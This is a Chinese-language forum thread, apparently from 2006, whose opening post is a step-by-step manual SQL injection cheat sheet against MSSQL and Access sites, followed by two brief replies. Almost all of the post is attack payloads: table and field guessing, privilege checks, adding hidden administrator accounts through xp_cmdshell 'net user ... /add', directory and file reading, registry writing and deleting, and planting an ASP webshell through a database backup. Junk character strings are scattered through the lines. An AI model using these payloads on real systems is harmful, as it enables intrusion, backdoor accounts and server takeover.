社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3197阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 bl:a&<F  
  2.初步判断是否是mssql ;and user>0 -)y> c  
M(.uu`B  
  3.注入参数是字符'and [查询条件] and ''=' N27K  
 m+72C]9  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' #K<=xP  
h8iaJqqvJ  
  5.判断数据库系统 C;58z 5*,  
0,vj,ic*WX  
  ;and (select count(*) from sysobjects)>0 mssql I&'S2=s  
)M&Azbu  
  ;and (select count(*) from msysobjects)>0 access DU*g~{8T$  
nU?Xc(Xy  
{Gk}3u/  
8^P2GG'+-  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 8r`VbgI&  
*hk{q/*Qw  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 c"%_]7  
0M/\bE G(_  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ~L \(/[  
JhMrm%  
  9.(1)猜字段的ascii值(access) ySr091Q  
^V XXq  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 y7;XOPm  
J#Ne:Aj_  
  (2)猜字段的ascii值(mssql) IxEQh)J X  
}Yo15BN+  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 o3TBRn,  
43}&w.AS  
  10.测试权限结构(mssql) Q8DQ .C  
eBSn1n  
WoClTb>F  
W)$|Hm:H  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- *s<dgFA'  
X*>o9J45V  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- U47k5s(J  
%b>y  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- =An Z>6  
G8 <It5CU  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- P60]ps!M  
H z < M  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- RqX4ep5j  
N8L)KgM5#7  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- S{"6PXzb  
gE6y&a  
  ;and 1=(select IS_MEMBER('db_owner'));-- UQji7K }  
9%)& }KK|  
$CQwBsYb=  
_>?8eC]4a  
  11.添加mssql和系统的帐户 Bu >yRL=*  
eed\0  
  ;exec master.dbo.sp_addlogin username;-- nE "b`  
  ;exec master.dbo.sp_password null,username,password;-- }&C!^v o  
H{tOCYyD  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- h>5~ (n8  
`w+9j-  
  ;exec master.dbo.xp_cmdshell 'net user username password KAZkVL  
# V9hG9%8  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- y3o4%K8  
~E6+2t*  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- ofrlTw&o  
e[ k;SSs  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- !#|fuOWe  
g7Q*KA+  
7Hkf7\JY  
`zsk*W1GA  
  12.(1)遍历目录 -{amzyvLE  
I(kIHjV|  
  ;create table dirs(paths varchar(100), id int) q2U"k  
LAVt/TcZS|  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' bg3jo1J  
9kg>)ty@  
  ;and (select top 1 paths from dirs)>0 Q@.9wEAJ  
SFPIr0 u  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)  !+VN   
]}Hv,a   
iU+,Jeu  
*M!YQ<7G^d  
  (2)遍历目录 nz?BLO=  
Q+js2?7^  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- V'hz1roe  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 m3!MHe~t  
LUVJ218p  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 n[S*gX0  
[ Zqg"`  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 <@ex})su  
gY^TBR0?m  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 E1Aa2  
;HwJw\fo  
,r,;2,;6nd  
hpe s  
  13.mssql中的存储过程 -@?>nLQb  
),FN29mZu  
  xp_regenumvalues 注册表根键, 子键 `l40awGCz  
/FZ )ej\  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 BqAwo  
R,Uy3N  
  xp_regread 根键,子键,键值名 %ycT}Lu  
05zdy-Fb  
  ;exec xp_regread <.XoC?j  
\Le #+ P  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 cDol o1*  
J-?(sjIX  
  xp_regwrite 根键,子键, 值名, 值类型, 值 %Ne>'252y  
2*E<G|-F  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 K4L#%KUPW  
j-E>*N}-_  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 e' ;c8WF3E  
o6%f%:&  
  xp_regdeletevalue 根键,子键,值名 bvvx(?!  
oQB1fs  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 O@&I.d$  
&,|uTIs  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Ykq }9  
:dc J6  
vv_?ip:t  
TyXOd,%zl  
  14.mssql的backup创建webshell /'+JP4mK  
c=E.-  
  use model QCnVZ" !(  
ds[~Cp   
  create table cmd(str image); } /FM#Xh  
0kEq|k9  
  insert into cmd(str) values (''); @2O\M ,g5  
(G'ddZAJV  
  backup database model to disk='c:\l.asp'; g-uFss  
(jMp`4P  
3Or3@e5r  
@isqFKjph  
  15.mssql内置函数 YR#1[fe*_  
~qxc!k!w4  
  ;and (select @@version)>0 获得Windows的版本号 _~<TAFBr  
n-WvIy  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa Ds/zl Z  
l,8| E  
  ;and (select user_name())>0 爆当前系统的连接用户 @35]IxD  
y5 +&P  
  ;and (select db_name())>0 得到当前连接的数据库 2AE|N_v8W  
J#nEGl|a  
Jc6 D^=  
%%u4( '=  
  16.简洁的webshell >?x Vr  
OQyOv%g5C  
  use model S)h1e%f, f  
,^T2hY`  
  create table cmd(str image); 1Pc'wfj  
}DwXs`M7  
  insert into cmd(str) values (''); evP`&23tP  
~=Sr0+vV  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
10+5=?,请输入中文答案:十五